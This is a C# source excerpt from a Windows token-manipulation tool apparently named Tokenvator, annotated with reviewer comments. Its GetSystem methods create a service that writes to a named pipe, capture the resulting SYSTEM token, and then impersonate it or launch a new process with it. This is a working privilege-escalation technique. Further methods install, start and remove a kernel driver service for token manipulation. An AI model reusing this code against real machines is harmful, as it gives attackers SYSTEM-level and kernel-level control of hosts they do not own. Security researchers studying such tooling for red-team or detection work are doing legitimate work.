////////////////////////////////////////////////////////////////////////////////
// Obtains a token from the Tokenvator service over the named pipe and launches
// a new process with it.
////////////////////////////////////////////////////////////////////////////////
// command:   image to launch, passed through to the chosen CreateProcess* variant.
// arguments: command line for that image.
//
// Ordering matters: the listener thread is started before the service, and
// waitHandle.WaitOne() blocks until _GetPipeToken signals (presumably once the
// pipe server is listening — confirm in _GetPipeToken), so the service is not
// started before the pipe is ready. hToken and waitHandle are class-level state
// filled in by _GetPipeToken, not locals of this method.
internal static void GetSystem(String command, String arguments)
{
    Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
    using (PSExec psExec = new PSExec("Tokenvator"))
    {
        // Return values of Connect/Create/Open/Start/Stop are not checked here,
        // so a failed step only surfaces when createProcess fails below.
        psExec.Connect(".");
        // The service command merely writes one line into the pipe; the pipe
        // server on the listener thread deals with the connecting client.
        psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        psExec.Open();
        thread.Start();
        waitHandle.WaitOne();
        psExec.Start();
        psExec.Stop();
    }
    thread.Join();

    // Session 0 means the caller is non-interactive (e.g. running as a service);
    // CreateProcessWithLogonW is used there and CreateProcessWithTokenW
    // otherwise. The reason for the split is not recorded here.
    Create createProcess;
    if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
    {
        createProcess = CreateProcess.CreateProcessWithLogonW;
    }
    else
    {
        createProcess = CreateProcess.CreateProcessWithTokenW;
    }
    // NOTE(review): unlike GetSystem(), hToken is not compared against
    // IntPtr.Zero before use, and it is neither closed nor reset afterwards,
    // so the handle remains open in the static after this call.
    createProcess(hToken, command, arguments);
}
////////////////////////////////////////////////////////////////////////////////
// Obtains a token from the Tokenvator service over the named pipe and
// impersonates it on the current thread.
////////////////////////////////////////////////////////////////////////////////
// Same pipe handshake as GetSystem(command, arguments): the listener thread is
// started before the service, and waitHandle.WaitOne() blocks until
// _GetPipeToken signals, so the service is only started once the pipe is ready.
// hToken and waitHandle are class-level state filled in by _GetPipeToken.
internal static void GetSystem()
{
    Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
    using (PSExec psExec = new PSExec("Tokenvator"))
    {
        // Return values of the PSExec calls are not checked; a failed step shows
        // up only as hToken staying IntPtr.Zero below.
        psExec.Connect(".");
        // The service command merely writes one line into the pipe; the pipe
        // server on the listener thread deals with the connecting client.
        psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        psExec.Open();
        thread.Start();
        waitHandle.WaitOne();
        psExec.Start();
        psExec.Stop();
    }
    thread.Join();

    // Only act on a token that was actually captured. The handle is closed and
    // the static cleared so a later call cannot pick up a stale value.
    if (IntPtr.Zero != hToken)
    {
        // NOTE(review): the return value is not checked, so "[+] Operating as"
        // is printed even if impersonation failed; in that case the name shown
        // is simply the unchanged identity.
        advapi32.ImpersonateLoggedOnUser(hToken);
        kernel32.CloseHandle(hToken);
        Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
        hToken = IntPtr.Zero;
    }
}
////////////////////////////////////////////////////////////////////////////////
// Stops and deletes the service named on the command line.
////////////////////////////////////////////////////////////////////////////////
// cLP: parsed command line; the service is read from the "servicename" key
//      (the sibling driver commands use "ServiceName" — whether GetData is
//      case-insensitive is not visible here, so the keys may or may not match).
// Each SCM step is attempted in order and the method returns quietly at the
// first one that fails; the PSExec wrapper is disposed on every path.
private static void _UnInstallDriver(CommandLineParsing cLP)
{
    string serviceName;
    if (!cLP.GetData("servicename", out serviceName))
    {
        Console.WriteLine("[-] Unable to identify /Service");
        return;
    }

    using (PSExec svc = new PSExec(serviceName))
    {
        // Short-circuit evaluation keeps the original order:
        // connect -> open -> stop -> delete.
        if (!svc.Connect(".") || !svc.Open() || !svc.Stop() || !svc.Delete())
        {
            return;
        }
    }
}
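////////////////////////////////////////////////////////////////////////////////
// Starts the KernelTokens Driver
////////////////////////////////////////////////////////////////////////////////
// cLP: parsed command line; /ServiceName selects the service to start.
// Asks the local service controller to start the named service. Failures are
// reported on the console and the method returns without throwing. The PSExec
// wrapper is an IDisposable and is released on every exit path.
private static void _StartDriver(CommandLineParsing cLP)
{
    string serviceName;
    if (!cLP.GetData("ServiceName", out serviceName))
    {
        Console.WriteLine("[-] ServiceName not set");
        return;
    }

    using (PSExec psexec = new PSExec(serviceName))
    {
        if (!psexec.Connect("."))
        {
            Console.WriteLine("[-] Unable to connect to service controller");
            return;
        }

        // A failed Start() returns silently, matching the other driver commands
        // in this file.
        if (!psexec.Start())
        {
            return;
        }
    }
}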
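////////////////////////////////////////////////////////////////////////////////
// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
////////////////////////////////////////////////////////////////////////////////
// Registers (when it does not already exist) and starts a kernel-mode service.
// cLP: parsed command line with
//   /ServiceName  service to open or create (default "TokenDriver")
//   /Path         driver image; resolved with Path.GetFullPath, falling back to
//                 CreateProcess.FindFilePath when the value is not a usable path
//   /Force        presence alone sets overwrite=true for CreateDriver; what
//                 CreateDriver does with it is not visible here
// Registering a kernel driver requires administrative rights against the SCM
// and leaves a new service entry behind. Every failure is reported on the
// console and the method returns without throwing; the PSExec wrapper is
// disposed on every exit path.
private static void _InstallDriver(CommandLineParsing cLP)
{
    string serviceName = "TokenDriver";
    string sn;
    if (cLP.GetData("ServiceName", out sn))
    {
        serviceName = sn;
    }

    string path = string.Empty;
    string p;
    if (cLP.GetData("Path", out p))
    {
        path = p;
    }

    // Only the presence of /Force matters; its value is ignored.
    bool overwrite = false;
    object f;
    if (cLP.GetData("Force", out f))
    {
        overwrite = true;
    }

    Console.WriteLine("[*] Service Name: " + serviceName);
    Console.WriteLine("[*] Service Path: " + path);

    using (PSExec psexec = new PSExec(serviceName))
    {
        if (!psexec.Connect("."))
        {
            Console.WriteLine("[-] Unable to connect to service controller");
            return;
        }

        string filename;
        try
        {
            filename = Path.GetFullPath(path);
        }
        catch (ArgumentException)
        {
            // Empty or malformed path (an absent /Path lands here): look the
            // image up by name instead.
            filename = CreateProcess.FindFilePath(path);
            if (string.IsNullOrEmpty(filename))
            {
                Console.WriteLine("[-] Unable to locate service binary");
                return;
            }
        }
        catch (Exception ex)
        {
            // Any other resolution failure (path too long, unsupported form,
            // access denied) is reported rather than returning silently.
            Console.WriteLine("[-] Unable to resolve service path: {0}", ex.Message);
            return;
        }
        Console.WriteLine("[*] Full Path: " + filename);

        if (!File.Exists(filename))
        {
            // The placeholder is filled in so the message names the missing file.
            Console.WriteLine("[-] Unable to find service binary: {0}", filename);
            return;
        }

        // Prefer an existing service; only register a new one when Open fails,
        // then re-open it so Start() has a handle to work with.
        if (!psexec.Open())
        {
            if (!psexec.CreateDriver(filename, overwrite))
            {
                return;
            }
            if (!psexec.Open())
            {
                return;
            }
        }

        if (!psexec.Start())
        {
            return;
        }
    }
}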